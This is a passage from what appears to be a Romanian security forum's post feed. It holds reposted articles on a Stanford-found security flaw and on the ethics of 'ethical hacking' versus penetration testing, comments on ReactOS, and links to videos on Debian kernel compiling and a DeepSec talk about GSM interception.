inconvenience to people," Mitchell said. "The fact that they're so widely used is evidence of their necessity." Stanford researcher Hristo Paskov also contributed to the study. The Stanford team collaborated with Romain Beauxis from Tulane University and Daniele Perito and Celine Fabry from INRIA, a computer science research institute in France. The research was funded by the National Science Foundation, the Air Force Office of Scientific Research and the Office of Naval Research. Melissae Fellet is a science-writing intern at the Stanford News Service. Sursa: Stanford computer scientists find Internet security flaw
React OS, inlocuitorul Windows?
Nytro replied to nedo's topic in Sisteme de operare si discutii hardware
Eu am vrut sa ma implic, dar nu e deloc usor, nu se fac lucruri banale pe acolo. Cauta cartea Windows NT Internals (co-autor - Alex Ionescu, un roman) daca iti plac astfel de lucruri. -
Kernel compiling the Debian way On this episode you are going to watch how to compile a kernel, the Debian's way. Further info at lgallardo.com/?en/?2010/?01/?25/?compilar-el-kernel-a-lo-debian/? Video: Kernel compiling the Debian way on Vimeo Cum sa compilezi kernelul rapid si usor, rezultand un .deb... E posibil sa mearga doar pe Debian. Nu am incercat.
Where Are the Ethics in Hacking? May 23, 2011 - Upasana Gupta A recent news story begs the question: What is "ethical" hacking? You may have heard about Australian security researcher Christian Heinrich, who hacked live into Facebook's privacy controls at an IT security conference and accessed private photographs of rival security professional Chris Gatford and his family, including the image of a child. The incident led to a journalist being arrested and having his iPad seized after he published some of the images online. A lot of people don't understand the difference between hacking and ethical hacking. Following the event, detective superintendent Brian Hay, head of the Fraud and Corporate Crime Group of the Queensland Police Service, criticized the demonstration of a so-called ethical hacking. "I think cultures have built up where hacking, in the past, has been a part of a competition, and you have black-hat conferences around the world. The technical reality is that on those occasions crimes may well have been committed." This latest incident has left many questioning what role ethics play in ethical hacking, and what this activity really is about. "The reason ethical hacking exists is because somebody less ethical in a different country will hack your systems and not tell you - that is going to happen no matter what," says Jeremiah Grossman, Founder and CTO of WhiteHat Security. "So, ethical hacking is conducted to hack yourself first and fix the issues and vulnerabilities that remain to avoid being a headline like Sony." Ethical hackers, then, attempt to exploit the IT security of a system on behalf of its owners by following certain polite rules, like getting a written or verbal consent from the owner of the system before the professional conducts the test. "What the Australian researcher did is not ethical hacking," says Jay Bavisi, President of EC-Council, a global certification and training organization for ethical hackers. "A lot of people don't understand the difference between hacking and ethical hacking." Terms like penetration testing, ethical hacking and hacking are interchangeably used, and Bavisi defines each: Hacker: simply a person who invades or interferes with another system with the intent to cause harm, without having any permission from the system owner. Ethical hacker: a professional hired by an organization to review its security posture from the eyes of the hacker. Ethical hackers test vulnerabilities of the systems. Penetration tester: a professional who goes a step beyond the ethical hacker and provides an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, either known and unknown hardware or software flaws, or operational weaknesses. These professionals are largely involved in remediation. The whole process involves a written consent and rules of engagement from the client, which clearly spell what they can or cannot do, "This is basically our 'get out of jail free' card," Bavisi says. Still, Ian Glover, president of the UK's Council of Registered Ethical Security Testers (CREST) , a global organization that assesses the skill and competence of professionals working in the penetration testing industry, says, "I don't like the term ethical hacking." According to him, the term is misleading as hacking immediately presents a negative view of people mounting unsolicited illegal attacks. The professional penetration industry provides an invaluable service to government and business validating security controls. While individuals who believe they can work illegally still exist, the professional penetration testing industry acts in a responsible manner within a strict legal and ethical framework. "In the past there was the opportunity to be a hacker, to do inappropriate things and then people would employ you. In the future that is not going to be the case, as neither the industry nor the buying community will accept individuals who have operated illegally," Glover says. The industry has matured, he says, and because of that the bar of entry is much higher for prospective testers. In this case, he adds that if Heinrich were to be a member of a professional organization like CREST, he would be immediately removed for his actions. There are ethics and morals involved when ethical hackers take up such contracts or positions. They clearly understand their limits dictated by the letter of authorization where the client specifies the scope of engagement. For instance, the servers that can or cannot be tested, the IP range ethical hackers can use etc. These professionals are aware of the legal framework and understand the requirement for full disclosure to the client. "Without permission, no ethical hacker will touch the job and go beyond the scope in any form. This is standard security practice," Bavisi says. The latest incident is just an example of a bad hacker, adds Grossman. "The researcher made a rather common mistake of demonstrating a live vulnerability on stage without permission. Would I have done it? No!" One of the key lessons in this case is the need for better education within the industry to highlight the differences among hackers, ethical hackers and penetration testers. "People must understand the difference between a cop and a thief," Bavisi says. Sursa: Where Are the Ethics in Hacking?
React OS, inlocuitorul Windows?
Nytro replied to nedo's topic in Sisteme de operare si discutii hardware
Nu au ce sa faca. Nu au copiat nimic de la Microsot. Am inteles ca cei de la Microsoft au cerut o analiza a codului sursa, dupa ce acum multi ani aparuse pe net codul sursa de la un Windows NT parca, si nu era nimic copiat. Munca lor e proprie sau "imprumutata" de la Wine (stiti si voi ce este). Ei doar se uita pe MSDN, vad ce functii au cei de la Microsoft, si le scriu ei de la 0. Am vrut si eu sa scriu 2-3 functii care am vazut ca nu sunt implementate, dar ar fi de preferat sa o faca cineva care se pricepe mai bine. PS: Puteti intalni des mesajul: functia nu a fost implementata. Si puteti invata foarte multe din codul sursa, eu ma uitam peste Loader-ul lor... -
Intercepting GSM Traffic This is the first talk about GSM security held at DeepSec in 2007. Steve talks about intercepting GSM traffic and attacking the A5 encryption algorithm. There were more talks at DeepSec 2009 and 2010. Video: http://vimeo.com/24117925